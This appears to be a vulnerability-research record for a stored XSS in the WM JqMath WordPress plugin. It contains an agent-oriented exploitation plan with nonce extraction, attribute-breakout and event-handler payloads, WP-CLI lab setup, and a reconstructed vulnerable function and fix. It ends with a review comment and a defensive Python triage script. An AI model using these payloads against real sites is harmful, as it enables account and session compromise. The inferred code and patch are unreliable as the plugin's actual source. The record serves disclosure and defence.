[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fXVZsMfuT6y-bFON1cU5YQJxUHQXzgNcISz_KbnkboP4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"source_links":31},"CVE-2026-3998","wm-jqmath-authenticated-contributor-stored-cross-site-scripting-via-style-shortcode-attribute","WM JqMath \u003C= 1.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'style' Shortcode Attribute","The WM JqMath plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'style' shortcode attribute of the [jqmath] shortcode in all versions up to and including 1.3. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes. The generate_jqMathFormula() function directly concatenates the 'style' attribute value into an HTML style attribute without applying esc_attr() or any other escaping. 
This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wm-jqmath",null,"\u003C=1.3","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-14 19:46:51","2026-04-15 08:28:16",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb4aebb45-b47b-4b5a-8281-400a4b786689?source=api-prod",[],"researched",false,3,"## Vulnerability Analysis: CVE-2026-3998 - Stored XSS in WM JqMath\n\n### 1. Vulnerability Summary\nThe **WM JqMath** plugin (versions \u003C= 1.3) contains a stored cross-site scripting (XSS) vulnerability within the handling of its `[jqmath]` shortcode. Specifically, the function `generate_jqMathFormula()` processes attributes passed to the shortcode. The `style` attribute is accepted from user input and concatenated directly into an HTML `\u003Cspan>` or `\u003Cdiv>` tag's `style` attribute without being passed through `esc_attr()` or similar sanitization. This allows an authenticated user with at least \"Contributor\" privileges (who can create posts) to inject arbitrary HTML attributes or break out of the `style` attribute to inject `\u003Cscript>` tags.\n\n### 2. Attack Vector Analysis\n*   **Shortcode:** `[jqmath]`\n*   **Vulnerable Attribute:** `style`\n*   **Authentication Level:** Contributor or higher. 
Contributors can create and save posts but cannot publish them; the XSS executes when an Editor or Administrator previews the post, and for every visitor once it is published. Because Contributors lack the `unfiltered_html` capability, WordPress runs their post content through kses filtering (`wp_filter_post_kses()`) on save, which strips `\u003Cscript>` tags from the stored content before the shortcode is ever processed; an attribute-breakout payload that adds an event-handler attribute (section 9) survives that filter because the stored text contains no HTML tag.\n*   **Payload Location:** The payload is embedded within the `style` attribute of the shortcode inside the post content.\n*   **Endpoint:** Standard WordPress post creation\u002Fediting (`\u002Fwp-admin\u002Fpost.php` or the REST API route `\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`).\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers the shortcode in the main plugin file (likely `wm-jqmath.php`):\n    `add_shortcode('jqmath', 'generate_jqMathFormula');`\n2.  **Attribute Parsing:** When a post containing `[jqmath]` is rendered, WordPress calls `generate_jqMathFormula($atts, $content)`.\n3.  **Processing:** Inside `generate_jqMathFormula()`:\n    *   The `$atts` array is processed (possibly using `shortcode_atts`).\n    *   The value of `$atts['style']` is retrieved.\n4.  **Sink:** The value is concatenated into an HTML string:\n    `return '\u003Cspan style=\"' . $atts['style'] . '\">' . $formula_markup . '\u003C\u002Fspan>';` (inferred)\n5.  **Output:** The unescaped string is returned to the WordPress content filter and rendered in the browser.\n\n### 4. Nonce Acquisition Strategy\nTo exploit this as an authenticated Contributor via the web interface, the agent must obtain a valid post-editing nonce.\n\n1.  **Login:** Use the `http_request` tool to authenticate as a Contributor.\n2.  **Access Post Creator:** Navigate to `wp-admin\u002Fpost-new.php`.\n3.  **Extract Nonce:** Use `browser_eval` to extract the `_wpnonce` required for the `sample-permalink` or the primary post-saving action.\n    *   `_wpnonce` is typically found in the `#_wpnonce` input field.\n    *   Command: `browser_eval(\"document.querySelector('#_wpnonce').value\")`\n4.  
**Alternative (REST API):** If the Block Editor is used, the agent can extract the REST nonce from the `wpApiSettings` object:\n    *   Command: `browser_eval(\"window.wpApiSettings?.nonce\")`\n\n### 5. Exploitation Strategy\nThe goal is to inject a `\u003Cscript>` tag by breaking out of the `style` attribute.\n\n**Step-by-step Plan:**\n\n1.  **Authentication:** Authenticate the agent as a user with the `contributor` role.\n2.  **Payload Construction:**\n    *   The target context is `\u003Cspan style=\"[USER_INPUT]\">`.\n    *   Payload: `\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n    *   Full Shortcode: `[jqmath style='\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>']test[\u002Fjqmath]`\n3.  **Post Creation:**\n    *   Use the `http_request` tool to send a POST request to `\u002Fwp-admin\u002Fpost.php`.\n    *   **Action:** `editpost`\n    *   **Parameters:**\n        *   `post_ID`: (The ID of a newly created draft)\n        *   `_wpnonce`: (Extracted in Step 4)\n        *   `content`: `[jqmath style='\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>']test[\u002Fjqmath]`\n        *   `post_title`: `XSS Test`\n4.  **Execution:** Navigate to the permalink of the draft post or use the \"Preview\" functionality.\n5.  **Confirmation:** Check the response body for the unescaped script tag.\n\n### 6. Test Data Setup\nBefore exploitation, ensure the environment is ready:\n1.  **Plugin Activation:** Verify `wm-jqmath` is installed and active.\n2.  **User Creation:** Create a contributor user:\n    `wp user create contributor_attacker attacker@example.com --role=contributor --user_pass=password123`\n3.  **Target Post:** Create a blank draft post for the contributor to edit:\n    `wp post create --post_type=post --post_status=draft --post_author=$(wp user get contributor_attacker --field=ID) --post_title=\"Draft\"`\n\n### 7. 
Expected Results\n*   **Injected Content:** When viewing the source of the rendered post, the output should look like:\n    `\u003Cspan style=\"\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">...\u003C\u002Fspan>`\n*   **Execution:** A browser navigating to the post should trigger the `alert(document.domain)` JavaScript.\n\n### 8. Verification Steps\n1.  **WP-CLI Verification:** After the HTTP request, verify the content is stored in the database:\n    `wp post get [POST_ID] --field=post_content`\n    Confirm it contains the payload exactly as sent. If the `\u003Cscript>` tags are missing but the rest of the attribute value is present, kses filtered the Contributor's content on save; switch to the attribute-breakout payload from section 9, which is stored verbatim.\n2.  **Frontend Check:** Use `browser_navigate` to the post's URL and check for the alert or for the injected script in the DOM. `document.querySelector('script')` only returns the first script element on the page (normally a core or theme script), so scan all of them:\n    `browser_eval(\"Array.from(document.scripts).some(s => s.textContent.includes('alert(document.domain)'))\")`\n\n### 9. Alternative Approaches\nIf breaking out of the `style` attribute with `\">` is blocked or fails due to specific quote handling:\n1.  **Attribute Injection:** Close the double-quoted `style` value and append an event-handler attribute instead of opening a new tag. Unlike a `\u003Cscript>` tag, this text survives kses filtering of Contributor content because the stored post contains no HTML tag; the tag is only formed when the shortcode renders:\n    *   Payload: `x\" onmouseover=\"alert(1)`\n    *   Shortcode: `[jqmath style='x\" onmouseover=\"alert(1)']`\n    *   Rendered: `\u003Cspan style=\"x\" onmouseover=\"alert(1)\">`\n2.  **CSS-Based XSS (Legacy Browsers):** If direct script injection is filtered but the style attribute is kept, attempt:\n    *   Payload: `background-image: url(\"javascript:alert(1)\")` (Note: This is rarely effective in modern browsers but confirms the lack of sanitization).\n3.  **Attribute Breakout (Single Quote):** If the plugin wraps the attribute in single quotes:\n    *   Payload: `';>\u003Cscript>alert(1)\u003C\u002Fscript>`\n    *   Shortcode: `[jqmath style=\"';>\u003Cscript>alert(1)\u003C\u002Fscript>\"]` (the shortcode attribute must be double-quoted here, otherwise the `'` in the payload terminates the shortcode value)","The WM JqMath plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'style' attribute in the [jqmath] shortcode. 
This occurs because the plugin fails to sanitize or escape the user-supplied 'style' attribute value before outputting it in an HTML tag, allowing Contributor-level users to inject arbitrary JavaScript.","\u002F\u002F wm-jqmath.php (inferred location based on research plan)\n\u002F\u002F Within the function generate_jqMathFormula($atts, $content)\n\nfunction generate_jqMathFormula($atts, $content) {\n    $atts = shortcode_atts( array(\n        'style' => '',\n        'display' => 'inline'\n    ), $atts );\n\n    \u002F\u002F ... processing formula content ...\n\n    if ($atts['display'] == 'block') {\n        return '\u003Cdiv style=\"' . $atts['style'] . '\">$$' . $content . '$$\u003C\u002Fdiv>';\n    } else {\n        return '\u003Cspan style=\"' . $atts['style'] . '\">$' . $content . '$\u003C\u002Fspan>';\n    }\n}","--- wm-jqmath.php\n+++ wm-jqmath.php\n@@ -10,9 +10,10 @@\n         'display' => 'inline'\n     ), $atts );\n \n+    $safe_style = esc_attr($atts['style']);\n     if ($atts['display'] == 'block') {\n-        return '\u003Cdiv style=\"' . $atts['style'] . '\">$$' . $content . '$$\u003C\u002Fdiv>';\n+        return '\u003Cdiv style=\"' . $safe_style . '\">$$' . $content . '$$\u003C\u002Fdiv>';\n     } else {\n-        return '\u003Cspan style=\"' . $atts['style'] . '\">$' . $content . '$\u003C\u002Fspan>';\n+        return '\u003Cspan style=\"' . $safe_style . '\">$' . $content . '$\u003C\u002Fspan>';\n     }\n }","The exploit requires an attacker to have at least Contributor-level privileges to create or edit posts. 1. The attacker logs into the WordPress dashboard and creates a new post or edits a draft. 2. In the post editor, the attacker inserts the [jqmath] shortcode with a malicious 'style' attribute payload designed to break out of the HTML attribute, such as: [jqmath style='\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>']formula[\u002Fjqmath]. 3. 
When the post is saved or previewed by an administrator or viewed by any visitor, the unescaped payload is rendered directly into the page source as \u003Cspan style=\"\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">...\u003C\u002Fspan>, causing the script to execute in the victim's browser.","gemini-3-flash-preview","2026-04-16 15:39:41","2026-04-16 15:40:02",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwm-jqmath\u002Ftags"]
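Review bot: the fix hunk wraps `$atts['style']` in `esc_attr()` but leaves `$content` concatenated raw into both the `<div>` and `<span>` branches (`'">$$' . $content . '$$</div>'` and `'">$' . $content . '$</span>'`); the shortcode body is attacker-controlled in the same way as the attribute, so it should be escaped as well, for example with `esc_html()`, before the jqMath delimiters are emitted around it. Note also that the page records `patched_in_version` as null and no patch diff files, so this hunk is the research model's inferred fix rather than a vendor patch; apply it against the plugin's real `generate_jqMathFormula()` body, not the reconstructed one shown above.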
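As an added example (not code from this page or from the WM JqMath plugin), the triage script below covers the stored-payload checks from sections 8 and 9 in one place: it pulls the `style` value out of every `[jqmath]` opening tag in a set of post bodies, flags values that cannot be plain CSS, and renders each flagged value through the unescaped sink the page attributes to versions <= 1.3 and through an `esc_attr()`-equivalent escape so the difference is visible. The shortcode and attribute regexes are an approximation of WordPress's `shortcode_parse_atts()` grammar and are an assumption, as is the use of `html.escape(quote=True)` to stand in for `esc_attr()`; the sample post rows are constructed, not real site data.

```python
"""Triage stored [jqmath] shortcodes for CVE-2026-3998 style-attribute abuse.

Added example, not plugin code. Post bodies are assumed to come from
`wp post get <ID> --field=post_content` or a wp_posts dump.
"""
import html
import re

# Approximates the attribute grammar shortcode_parse_atts() accepts for the
# value forms that matter here: name="v", name='v', name=v (assumption).
_ATTR_RE = re.compile(
    r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s'"\]]+))"""
)
# Opening [jqmath ...] tag only; WordPress likewise disallows ']' inside attributes.
_SHORTCODE_RE = re.compile(r"\[jqmath\b([^\]]*)\]", re.IGNORECASE)

# Indicators that a style value is not CSS but an attempt to leave the
# double-quoted style="..." context or smuggle a scriptable construct.
_SUSPICIOUS = [
    ("attribute_breakout", re.compile(r'["<>]')),            # ends the attribute / opens a tag
    ("event_handler", re.compile(r"\bon\w+\s*=", re.I)),      # onmouseover=, onerror=, ...
    ("javascript_uri", re.compile(r"javascript\s*:", re.I)),  # url("javascript:...") variants
]


def extract_style_values(post_content):
    """Return the raw style= value of every [jqmath] opening tag in a post body."""
    values = []
    for tag in _SHORTCODE_RE.finditer(post_content):
        for attr in _ATTR_RE.finditer(tag.group(1)):
            name = attr.group(1).lower()
            value = next(v for v in attr.groups()[1:] if v is not None)
            if name == "style":
                values.append(value)
    return values


def classify(style_value):
    """Return the names of the indicators that fire on one style value, in list order."""
    return [name for name, rx in _SUSPICIOUS if rx.search(style_value)]


def render_vulnerable(style_value, formula):
    """Inline sink as the page describes it for versions <= 1.3: value concatenated unescaped."""
    return '<span style="' + style_value + '">$' + formula + '$</span>'


def render_fixed(style_value, formula):
    """Same sink with an esc_attr()-equivalent: html.escape(quote=True) encodes the same five
    characters (&, <, >, ", ') that esc_attr() does, with ' as &#x27; rather than &#039;."""
    return '<span style="' + html.escape(style_value, quote=True) + '">$' + formula + '$</span>'


def triage(posts):
    """posts: {post_id: post_content}. Returns {post_id: [(style_value, indicators), ...]}
    containing only posts with at least one flagged style value."""
    findings = {}
    for post_id, content in posts.items():
        hits = [(s, classify(s)) for s in extract_style_values(content)]
        hits = [(s, ind) for s, ind in hits if ind]
        if hits:
            findings[post_id] = hits
    return findings


# Constructed sample rows standing in for wp_posts.post_content; not real site data.
SAMPLE_POSTS = {
    101: "Euler: [jqmath style='color:#333; font-size:1.2em']e^{i\\pi}+1=0[/jqmath]",
    102: "[jqmath style='\";><script>alert(document.domain)</script>']x[/jqmath]",
    103: "[jqmath style='x\" onmouseover=\"alert(1)']y[/jqmath]",
    104: "[jqmath display='block' style='background-image:url(\"javascript:alert(1)\")']z[/jqmath]",
}

if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_POSTS).items():
        for style, indicators in hits:
            print(f"post {pid}: {indicators} style={style!r}")
            print("  vulnerable:", render_vulnerable(style, "x"))
            print("  fixed:     ", render_fixed(style, "x"))
```

Post 101 is ordinary CSS and produces no finding; 102 is the page's primary payload, 103 the kses-surviving event-handler variant, and 104 the legacy `javascript:` URI. A literal `"` inside an otherwise benign `style` value is flagged deliberately, because the vulnerable sink would close the attribute on it anyway. To run it against a live site, build the `posts` dict from `wp post list --post_type=post --field=ID` and `wp post get <ID> --field=post_content`.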